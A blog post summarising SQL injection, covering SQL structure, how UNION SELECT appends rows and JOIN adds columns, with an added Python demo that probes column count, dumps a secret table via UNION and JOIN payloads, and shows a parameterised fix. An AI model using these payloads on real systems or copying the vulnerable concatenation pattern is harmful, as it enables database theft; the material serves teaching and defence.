SQL injection summary

About SQL structure

The basic SQL structure is

SELECT [column] FROM [table]

This query produces a new table, call it x. The table part can be an actual table or a table produced by another query (a subquery), which is what makes queries composable.

The basic statements are the four CRUD operations, INSERT / DELETE FROM / UPDATE / SELECT. Only SELECT returns a table, and the subqueries contained in a SELECT can themselves only be SELECTs.

```sql
INSERT `user` values('ssss','ddddd')
> Affected rows: 1
> Time: 0.007s

DELETE FROM `user` WHERE `user` = 1
> Affected rows: 1
> Time: 0.003s

UPDATE `user` set `user` = 1
> Affected rows: 1
> Time: 0.001s

SELECT * FROM `user`
> OK
> Time: 0s

+----------+-------+
| pass_or_ | user  |
+----------+-------+
| ssss     | ddddd |
+----------+-------+
```

About injection structure

SELECT injection generally relies on UNION SELECT and JOIN. UNION SELECT adds rows (the attacker's rows are appended below the original result), while JOIN adds columns. UNION SELECT requires both sides to return the same number of columns, which is why the column count of the original query is probed first (for example with ORDER BY n or a growing UNION SELECT NULL,NULL,...); a JOIN has no such width requirement, but it needs an injection point inside the FROM clause.

```sql
SELECT * FROM `user` UNION SELECT 1,2
+----------+------+
| pass_or_ | user |
+----------+------+
| ssss     | 1    |
| 1        | 2    |
+----------+------+

SELECT * FROM `user` left JOIN (SELECT 1)a on 1=1
+----------+------+---+
| pass_or_ | user | 1 |
+----------+------+---+
| ssss     | 1    | 1 |
+----------+------+---+
```
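To show how the two structures above are actually used from the application side, here is an added example (not code from the original post) in Python against an in-memory SQLite database standing in for the MySQL server used on the page. The `user` table with columns `pass_or_` and `user` follows the post; the `secret` table, its contents, the two vulnerable lookup functions and all other names are constructed for this example. The UNION path first probes the width of the injected-into SELECT by growing `UNION SELECT NULL,...` until the database stops rejecting it, then uses that width to append rows from another table; the JOIN path assumes a second, hypothetical injection point inside the FROM clause, where a LEFT JOIN widens every row without having to match any column count. The parameterised lookup beside the vulnerable one shows the fix.

```python
import sqlite3

# Constructed sample schema. `user` (pass_or_, user) mirrors the post's table;
# `secret` and its contents are made up for this example. Assumption: SQLite
# stands in for the MySQL server used in the post.
SCHEMA = """
CREATE TABLE user (pass_or_ TEXT, user TEXT);
INSERT INTO user VALUES ('ssss', '1');
CREATE TABLE secret (name TEXT, token TEXT);
INSERT INTO secret VALUES ('admin', 'flag{constructed}');
"""


def make_db():
    """Fresh in-memory database loaded with the constructed schema."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def lookup_vulnerable(con, username):
    """Hypothetical app code: user input concatenated into the SQL text,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    sql = "SELECT pass_or_, user FROM user WHERE user = '" + username + "'"
    return con.execute(sql).fetchall()


def lookup_safe(con, username):
    """Hardened form of the same lookup: the value is bound as a parameter
    and never becomes part of the statement's structure."""
    sql = "SELECT pass_or_, user FROM user WHERE user = ?"
    return con.execute(sql, (username,)).fetchall()


def find_column_count(con, max_cols=10):
    """Probe the width of the SELECT being injected into.
    A UNION whose right side has the wrong number of columns is rejected by
    the database, so the first width that runs without error is the answer.
    The trailing `-- ` comments out the closing quote the app appends."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "-- "
        try:
            lookup_vulnerable(con, payload)
            return n
        except sqlite3.DatabaseError:
            continue
    return None


def dump_secret_via_union(con, width):
    """UNION adds rows: with the width known, rows from another table are
    appended to the original result, padded with NULL to match the width."""
    if width < 2:
        raise ValueError("need at least two columns for name and token")
    cols = ["name", "token"] + ["NULL"] * (width - 2)
    payload = "' UNION SELECT " + ", ".join(cols) + " FROM secret-- "
    return lookup_vulnerable(con, payload)


def list_table_vulnerable(con, table_expr):
    """Second hypothetical injection point, this time inside the FROM clause
    (for example a 'table name' taken straight from the request)."""
    return con.execute("SELECT * FROM " + table_expr).fetchall()


def dump_secret_via_join(con):
    """JOIN adds columns: there is no width to match, every row of the
    original table is simply widened with the columns of the joined table."""
    return list_table_vulnerable(con, "user LEFT JOIN secret ON 1=1")


if __name__ == "__main__":
    db = make_db()
    width = find_column_count(db)
    print("column count:", width)
    print("union rows:", dump_secret_via_union(db, width))
    print("join rows:", dump_secret_via_join(db))
    print("safe lookup:", lookup_safe(db, "' UNION SELECT NULL,NULL-- "))
```

The probe stops at width 2 because the original SELECT returns two columns; the same payload against `lookup_safe` is just compared as a string and matches nothing. On MySQL the comment terminator and error text differ, but the width rule for UNION and the no-width rule for JOIN are the same.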
Author: hundan
Link: https://hundan.org/2022/12/30/sql注入总结/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.